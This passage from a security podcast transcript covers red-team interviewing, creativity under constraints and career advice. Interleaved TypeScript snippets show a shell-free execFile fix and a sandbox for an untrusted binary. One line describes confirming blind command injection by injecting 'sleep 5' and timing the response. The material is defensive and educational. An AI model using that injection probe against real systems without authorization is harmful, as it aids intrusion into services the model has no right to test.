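// The fix, even when a subprocess must still be started with attacker-controlled
// arguments: pass them as an argv array with no shell, so the input can only
// ever be argument text, never a new command.
function pingSafe(host: string): void {
  execFile("ping", ["-c", "1", host], (_err, stdout) => console.log(stdout));
}
```

The blind variants he walks through, with no visible output or restricted egress, are commonly confirmed with timing instead: inject something like sleep 5 and watch the response latency.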

No, that sounds like a really enjoyable interview. And it also sounds like the signal that you're going after cuts right to the heart of that creativity that we were talking about earlier, where there's a little bit more of an art to this than a prescribed science. And part of that really is not being afraid to do a depth-first search down these little, what do you call them, little glimmers of odd behavior in systems that all mean well. Like, this software is all stuff that a human being has written with good intentions.

Here's what we want this thing to do. Here's how it works. Here's how it's presented to the world. But we're human, and so there are bugs, and there's mistakes.

And that's okay to notice them, to notice those little flickers. Let's call them flickers. These little flickers across the system. It really takes a keen eye and attention to detail and patience with yourself as you dig deeper.

And as you were describing that and the signal that you look for inside the interviews, it almost got me thinking, that's really the signal that you're looking for is that creativity. And that's spectacular. There is a book. Here, let me look it up real quick.

It is called Seeing What Others Don't. It's on my list, but I haven't read it. Oh, this is on your list? I highly recommend it.

You're going to love it. I'll just plug it real quick. It's by Gary Klein.

It's called Seeing What Others Don't: The Remarkable Ways We Gain Insights. And what this guy does is he takes a huge case study of all of these really great instances of creativity that have bubbled up over the years. And he just looks into the context where the creativity came from, and he organizes it into this really elegant framework where there are three primary contexts in which folks get creative. One of them is noticing a contradiction.

We think the world is X, but you notice something that indicates otherwise, and then you dig into why. Like, why is it not what everyone is saying it is? That's one form of creativity. But there's another one, which really resonates with how I think that interview flows, and that is constraint-based creativity.

So when you constrain a system, problems get more and more specific. And with the constraints introduced to a system, like you have to think different. And oftentimes, one of those constraints is the time vector. And so one of the situations that he highlights in the book is there's these firefighters, they're fighting a fire, and the winds shift.

And all of a sudden, the fire is now chasing up after these firefighters out in the middle of nowhere. It's actually out here in California. And they've realized, these firefighters realized, they could not outrun this wildfire that was rushing up a hill because the winds had changed to work against them. They were either going to die in this fire, or they were going to somehow have a moment of ingenious insight and creativity to save themselves.

And so the leader actually realized, like, oh, we're not going to make it. We need to protect ourselves. And the best way to protect themselves from this raging fire was to actually start a fire. Oh, right.

And to protect themselves from the fire, because if it's already burned, it's not going to burn again. And so you'd have a little space where you would not get burned. So that's what they did. And they were saved.

But it's that constraint of time, and your life is on the line. And there are certain things at stake, and you've got to find a creative path forward. And maybe it's the type of stress that you've experienced yourself in a red team, where there's a time constraint on how long you're willing, or how long you have, to look at something, along with other constraints defined by the parameters of the system, that results in some really interesting creative things happening. Absolutely.

I have another interview question that I actually love to ask around constraints like that, which is to flip the hypothetical onto the defender side. Let's take a typical vulnerability that you might see, add a bunch of constraints to it, and see how you solve the problem. So the one I like to ask is: let's say that you're given an executable from a vendor, and you know through some back channel that it's a very insecure executable, it has all sorts of vulnerabilities in it, but you have to run it for business reasons. You can't reverse it or change it for legal reasons.

And so how do you run it as securely as you can? And the other constraint is it has to accept, maybe not directly, but it has to accept some attacker-controlled input across the internet. And so I feel like most security people focus a lot on the vulnerabilities and less on the other layers of defense. And so I really like to impose that constraint: you can't fix this.

It's just going to be vulnerable. So now what do you do about that? I am in love with this question. So that's super interesting.
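
One shape of answer, sketched under loud assumptions (a Unix host, a hypothetical binary path, Node as the wrapper): isolate the process rather than fix it. A real deployment would stack more layers on top of this, such as containers or VMs, seccomp, read-only filesystems, and tight network egress policy:

```typescript
// Sketch: run an untrusted vendor binary with some blast-radius reduction.
// "/opt/vendor/blackbox" is a hypothetical path; uid 65534 is "nobody" on many systems.
import { spawn } from "node:child_process";

const child = spawn("/opt/vendor/blackbox", [], {
  uid: 65534,              // drop to an unprivileged user (requires root to set)
  gid: 65534,
  env: {},                 // no inherited secrets or tokens in the environment
  cwd: "/var/empty",       // nothing useful to read or clobber in the working dir
  stdio: ["pipe", "pipe", "pipe"],
});

// Feed it only the one input it must accept, then close stdin.
child.stdin?.write("attacker-controlled input arrives here\n");
child.stdin?.end();

child.stdout?.on("data", (chunk) => process.stdout.write(chunk));
child.on("exit", (code) => console.log(`vendor binary exited: ${code}`));
```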

I bet you hear all sorts of stuff. Oh yeah. All sorts of interesting answers to that question. And another thing, speaking of constraints, it's not an interview question, but just something I wanted to bring up: that's actually something that I learned a lot about back at BitMEX, where we were a relatively small team with really high stakes and real adversaries.

And those constraints forced us to be very creative. And I learned so much. I would really recommend if anybody's looking to significantly up their learning, go to a place like that. Go to a place with high stakes, constraints, and real adversaries, and you will be forced to learn a lot.

Amazing. I love being pushed outside my comfort zone. That's the only place you do any learning or growing that's worthwhile. I think that's one of the best reasons to do a startup, to join a startup, to build something: to push yourself outside your comfort zone, because you're going to learn and you're going to grow.

If nothing else, you're going to come out the other side much improved. This has been spectacular. I really enjoyed our conversation.

Would you like to leave our audience with any words of wisdom, parting words of wisdom? Ooh, any words of wisdom? Okay. First word of wisdom is red teams can make really interesting PMs.

I know we've talked about this a lot, but it's a somewhat unusual role. And I think there should be a lot more of it. So if any of you are interested in experimenting with that, I would highly encourage it. Second word of wisdom is that there are many layers of defenses that you can put in place between an attacker exploiting a vulnerability and an attacker accomplishing their goal.

And if you really want to make our lives miserable, exploit every one of those opportunities. The engagement doesn't end with the vulnerability. It ends when the attacker accomplishes their goal. So I would encourage folks to focus on that.

I think a lot of people tend to over-index on vulnerabilities specifically. And let's see what else. If someone were inspired by listening to you share all of your stories and wanted to dabble in red teaming or explore that as a career opportunity, as a career path perhaps even, what would you recommend that they do? Yeah, that's a great question.

So, on red teaming: red teamers are very broad. I think they have to be very broad. You have to be a generalist. And that's not to say you can't have a specialty, but it is to say that you really need to understand a lot about a lot of different types of systems. Examples of things that you might need to understand:

Everything from social engineering and sending phishing emails, to how the internet works, to how modern software is built, to how to program in different languages, to how to find and exploit application security vulnerabilities, to how IT organizations work in a company and how software makes its way onto your laptop. You should really thoroughly understand the defender: understand what tools they have to monitor their environment, understand what footprint your activities leave in those tools, understand that there's a human sitting behind that screen looking through thousands of alerts, looking for a reason to say that this is a false positive or something.

And so I think understanding all of those aspects of red teaming is really important. And a good way to get some of that is to work on a lot of different types of security teams. Go try your hand at D&R, at designing some security infrastructure, or even at application development. Go try to build something and break it.

Also, contributing to open source, I think, is a really great way to get broad experience. Go find projects, like security tools that red teamers use, that you're really interested in. Find out how they work, fix bugs, add features that you've always wanted. Those are really good ways to thoroughly understand the systems that you're attacking and the tools that you use.

Go look at TruffleHog. It's open source. You should definitely go look at TruffleHog.

You should also go look at Peacemaker, too. It's a nice security tool. All right, awesome. Hey, it's been an absolute pleasure.

This has been a really interesting conversation. Thank you so much. I am filled with gratitude for your time, all of the stories, and your sharing of your experience. Hey, I've really enjoyed this too, John.

Thanks so much for having me. And thanks to all our listeners out there. And stay tuned next time for another episode of the Security Podcast of Silicon Valley.